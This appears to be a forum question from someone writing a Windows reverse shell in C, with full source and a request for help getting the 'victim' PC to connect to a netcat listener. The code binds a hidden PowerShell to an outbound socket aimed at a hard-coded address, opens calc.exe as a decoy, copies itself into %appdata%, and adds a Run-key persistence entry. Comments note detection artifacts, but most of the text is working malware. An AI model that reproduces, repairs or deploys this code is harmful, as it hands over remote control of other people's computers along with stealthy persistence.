
I'm trying to make a simple reverse shell in C, but the issue arises when I have to connect the victim to my computer. I set up my listener, but it never connects; it only opens a blank cmd window on the victim PC. The code is this:



#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#include <stdlib.h>

#pragma comment(lib, "Ws2_32.lib")
#define DEF_BUFF 2048

/*
 * runShell - endless loop that opens a TCP connection to server:Port and,
 * when the connect call reports no error, starts a PowerShell child process
 * whose stdin/stdout/stderr are the connected socket.
 *
 * server: dotted-quad IPv4 string, passed to inet_addr().
 * Port:   TCP port in host byte order, converted with htons().
 *
 * Does not return normally: the only exit visible here is exit(0) after the
 * peer sends exactly "exit\n".
 *
 * Defender notes (what this leaves behind for detection):
 *  - a powershell.exe child started with "-WindowStyle Hidden" by a non-shell
 *    parent, with inherited handles (bInheritHandles = TRUE) that point at a
 *    network socket rather than a console or pipe (ATT&CK T1059.001);
 *  - an outbound TCP connection to a hard-coded address and port supplied by
 *    the caller;
 *  - when the connect branch is not taken, the loop body ends and the loop
 *    restarts immediately, so the host shows back-to-back outbound
 *    connection attempts to the same endpoint.
 */
void runShell(char* server, int Port)
{
    while(1)
  {
     
     WSADATA wsaData;
     SOCKET Winsock;
     struct sockaddr_in address;
     char Rec_dat[DEF_BUFF];
     STARTUPINFO process_startup;
     PROCESS_INFORMATION p_info;
 
    // Winsock 2.2 is initialised and a new TCP socket is created on every
    // pass through the loop; neither return value is inspected.
    WSAStartup(MAKEWORD(2,2), &wsaData);
    Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);

   
    // Remote endpoint: IPv4, port in network byte order, address parsed from
    // the dotted-quad string.
    address.sin_family = AF_INET;
    address.sin_port = htons(Port);
    address.sin_addr.s_addr =inet_addr(server);
   
    // Success is judged from WSAGetLastError() rather than from the return
    // value of WSAConnect().
    WSAConnect(Winsock,(SOCKADDR*)&address, sizeof(address),NULL,NULL,NULL,NULL);
    if (WSAGetLastError() == 0)
        {

        // Build a STARTUPINFO that replaces the child's three standard
        // handles with the socket, then launch PowerShell with handle
        // inheritance enabled. This socket-as-stdio pattern is the
        // behaviour endpoint telemetry keys on.
        memset(&process_startup, 0, sizeof(process_startup));
                char proc[] = "powershell.exe -WindowStyle Hidden";
        process_startup.cb=sizeof(process_startup);
        process_startup.dwFlags=STARTF_USESTDHANDLES;
        process_startup.hStdInput = process_startup.hStdOutput = process_startup.hStdError = (HANDLE)Winsock;
        CreateProcess(NULL, proc, NULL, NULL, TRUE, 0, NULL, NULL, &process_startup, &p_info);
               // Block until the child exits, then release its handles.
               WaitForSingleObject(p_info.hProcess, INFINITE);
               CloseHandle(p_info.hProcess);
               CloseHandle(p_info.hThread);
               // Only after the child has exited does the parent read from
               // the socket itself.
               memset(Rec_dat, 0, sizeof(Rec_dat));
               int Rec_code = recv(Winsock, Rec_dat, DEF_BUFF, 0);
               if (Rec_code <= 0)
               {
                 // Peer closed or recv failed: tear down and start over.
                 closesocket(Winsock);
                 WSACleanup();
                 continue;
               } // end if
               // An exact "exit\n" from the peer terminates the whole process.
               if (strcmp(Rec_dat, "exit\n") == 0)
               {
                   exit(0);
                } // end if
      } // end if (WSAGetLastError() == 0)
   } // end while
} // end function runShell


/*
 * main - launches a decoy, installs per-user persistence, then enters
 * runShell() with a hard-coded endpoint (192.168.61.209:8080).
 *
 * Defender notes (artifacts created by the three system() calls, each of
 * which spawns cmd.exe as a child of this binary):
 *  - calc.exe started from C:\WINDOWS\System32 as a visible decoy;
 *  - reverse.exe copied from the current directory into %appdata%;
 *  - reg.exe writing a REG_SZ value named "Secure" under
 *    HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run that references
 *    %appdata%\reverse.exe (ATT&CK T1547.001). Monitoring writes to this
 *    key and executables launched from %appdata% covers this step.
 *
 * NOTE(review): as posted, the REG ADD statement has no terminating ';',
 * so the listing does not compile exactly as shown.
 */
int main()
 {
        char ip[] = "192.168.61.209";
        int p = 8080;
        system("start C:\\WINDOWS\\System32\\calc.exe"); // fire decoy
        system("cmd /c copy .\\reverse.exe %appdata%");  // copy malware to appdata
        // Register the copied binary under the current user's Run key so it
        // starts at logon; /F overwrites an existing value without prompting.
        system("cmd /c REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V \"Secure\" /t REG_SZ /F /D \"%appdata%\\reverse.exe")
        runShell(ip, p);   // call the runShell
        return 0;
 } // end main

On my PC, I set up the listener with netcat, but I'm unable to connect the two computers.
